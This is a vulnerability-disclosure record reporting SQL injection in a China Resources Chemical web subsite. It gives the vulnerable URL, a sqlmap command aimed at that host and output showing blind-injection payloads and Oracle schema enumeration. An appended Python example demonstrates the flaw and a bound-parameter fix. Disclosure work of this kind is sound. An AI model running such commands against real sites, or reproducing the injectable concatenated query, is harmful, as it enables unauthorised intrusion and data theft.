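2015-10-09: Details reported to the vendor; awaiting vendor handling
2015-10-10: Vendor confirmed; details disclosed to the vendor only
2015-10-20: Details disclosed to core white hats and experts in related fields
2015-10-30: Details disclosed to regular white hats
2015-11-09: Details disclosed to intern white hats
2015-11-24: Details disclosed to the public
SQL injection vulnerability in a China Resources Chemical subsite
1. Vulnerable page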
http://eip.crcchem.com/page/element/news/more.jsp?eid=4721
2. Payload
python.exe sqlmap\sqlmap.py -u "http://eip.crcchem.com/page/element/news/more.jsp?eid=4721" -v 3 --random-agent --dbs --current-user --no-cast --thread 10
3.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: eid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: eid=4721 AND 5245=5245
    Vector: AND [INFERENCE]
---
[10:35:14] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:35:14] [INFO] fetching current user
[10:35:14] [INFO] retrieving the length of query output
[10:35:14] [INFO] resumed: 7
[10:35:14] [DEBUG] performed 0 queries in 0.00 seconds
[10:35:14] [INFO] resumed: ECOLOGY
[10:35:14] [DEBUG] performed 0 queries in 0.00 seconds
current user: 'ECOLOGY'
[10:35:14] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:35:14] [INFO] fetching database (schema) names
[10:35:14] [INFO] fetching number of databases
[10:35:14] [PAYLOAD] 4721 AND ASCII(SUBSTRC((SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES),1,1))>51
[10:35:14] [DEBUG] declared web page charset 'utf-8'
[10:35:14] [PAYLOAD] 4721 AND ASCII(SUBSTRC((SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES),1,1))>48
[10:35:14] [PAYLOAD] 4721 AND ASCII(SUBSTRC((SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES),1,1))>1
[10:35:15] [INFO] retrieved:
[10:35:15] [DEBUG] performed 3 queries in 0.98 seconds
[10:35:15] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:35:15] [ERROR] unable to retrieve the number of databases
[10:35:15] [INFO] falling back to current database
[10:35:15] [INFO] fetching current database
[10:35:15] [INFO] retrieving the length of query output
[10:35:15] [INFO] resumed: 7
[10:35:15] [DEBUG] performed 0 queries in 0.00 seconds
[10:35:15] [INFO] resumed: ECOLOGY
[10:35:15] [DEBUG] performed 0 queries in 0.02 seconds
[10:35:15] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
available databases [1]:
[*] ECOLOGY
1. Filter characters
2. Remove pages that are not needed
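An added example, not part of the original report or the vendor's code: it shows why the boolean-based blind condition in the sqlmap output works against a concatenated query, and how validating eid as an integer and passing it as a bind variable removes that signal. sqlite3 stands in for the Oracle back end, and the table, column and function names are assumptions.

```python
import sqlite3

# Constructed stand-in for the news table behind more.jsp; the table and
# column names are hypothetical, and sqlite3 replaces the Oracle back end.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (eid INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (4721, 'constructed sample row')")
    return db

def lookup_concatenated(db, eid):
    # Assumed shape of the flaw: the raw request parameter is pasted into
    # the SQL text, so anything after the number is parsed as SQL.
    return db.execute("SELECT title FROM news WHERE eid = " + eid).fetchall()

def parse_eid(raw):
    # Allow-list validation: eid is a short run of ASCII digits, nothing else.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 10):
        raise ValueError("eid must be a decimal integer")
    return int(raw)

def lookup_bound(db, eid):
    # Validate first, then pass the value as a bind variable so it can
    # never become part of the SQL syntax.
    sql = "SELECT title FROM news WHERE eid = ?"
    return db.execute(sql, (parse_eid(eid),)).fetchall()

def differs_on_truth(lookup, db):
    """Regression check: does the response change between a true and a
    false condition appended to eid? True means the query is injectable."""
    def page(value):
        try:
            return lookup(db, value)
        except ValueError:
            return "rejected"
    # First value is the payload shown in the report; second is its false twin.
    return page("4721 AND 5245=5245") != page("4721 AND 5245=5246")

if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks a boolean:", differs_on_truth(lookup_concatenated, db))
    print("validated + bound query leaks a boolean:", differs_on_truth(lookup_bound, db))
    print("legitimate request still works:", lookup_bound(db, "4721"))
```
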
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-10-10 14:48
Thank you for the submission
None yet